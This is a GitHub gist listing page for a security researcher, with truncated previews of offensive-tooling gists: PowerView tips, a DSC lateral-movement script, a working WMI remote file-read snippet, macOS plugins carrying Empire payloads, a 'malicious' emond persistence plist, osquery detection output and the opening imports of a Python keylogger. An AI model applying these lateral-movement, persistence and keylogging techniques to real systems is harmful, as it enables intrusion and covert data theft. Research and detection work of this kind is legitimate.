Chris Ross xorrior
@xorrior
xorrior / PowerView-3.0-tricks.ps1
Created Jul 5, 2018 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
xorrior / FileReadPrimitive.ps1
Created Jun 28, 2018 — forked from mattifestation/FileReadPrimitive.ps1
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
$CimSession = New-CimSession -ComputerName 10.0.0.2
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
[Array]::Reverse($FileLengthBytes)
xorrior / SMConfMigratorPlugin.h
Created Jun 18, 2018
SMConfMigratorPlugin header file
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
#import "NSObject.h"
#import "SMSystem_FileManagerProtocol.h"
//<SMSystem_FileManagerProtocol>
@class NSObject, SMMigrationRequest;
xorrior / empire-migrationplugin.m
Created May 25, 2018
Migration Plugin with Empire Payload
//
// demoClass.m
// testExampleBundle
//
// Created by Chris Ross on 4/17/18.
// Copyright © 2018 Void. All rights reserved.
//
#import <Foundation/Foundation.h>
#import <objc/objc.h>
xorrior / messagebox.m
Last active Apr 3, 2019
Installer Plugin that pops a message box to the user
//
// MyInstallerPane.m
// messagebox
//
// Created by Chris Ross on 1/23/18.
// Copyright © 2018 testplugin. All rights reserved.
//
/*
This should be in MyInstallerPane.h
xorrior / emond-examples.txt
Last active Jan 19, 2018
fswatch and osquery command syntax with output
Fswatch command
fswatch -r --format="'{\"path\": \"%p\", \"timestamp\":\"%t\", \"flag\": \"%f\"}'" /etc/emond.d/rules/
Output when event is triggered
'{"path": "/private/etc/emond.d/rules/test.plist", "timestamp":"Tue Jan 16 21:17:24 2018", "flag": "PlatformSpecific IsFile"}'
osquery.results.log output from event.
{"name":"file_events","hostIdentifier":"host","calendarTime":"Thu Jan 11 07:00:10 2018 UTC","unixTime":"1515654010","epoch":"0","counter":"0","columns":{"action":"CREATED","atime":"1515653980","category":"emond","ctime":"1515653980","gid":"0","hashed":"1","inode":"1316814","md5":"b1f38ed6d9dca2d33ce733d51617e900","mode":"0644","mtime":"1515653980","sha1":"003a4a25662147ca19692dd01d2d7e06ea751c5e","sha256":"f26ee0eab108d3794426f609ccd878d7a7057e2fab3bea215152e4f35c82b0cf","size":"986","target_path":"\/private\/etc\/emond.d\/rules\/test.plist","time":"1515653983","transaction_id":"2101010","uid":"0"},"action":"added"}
xorrior / bad.plist
Last active May 16, 2018
Example Malicious emond plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>empire rules</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
xorrior / SampleRules.plist
Created Jan 9, 2018
Sample Plist for emond
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>sample rule</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
xorrior / keylogger.py
Created Dec 11, 2017
Python on disk keylogger
import zipfile
import io
import sys
import os, imp
import base64
import threading
moduleRepo = {}
_meta_cache = {}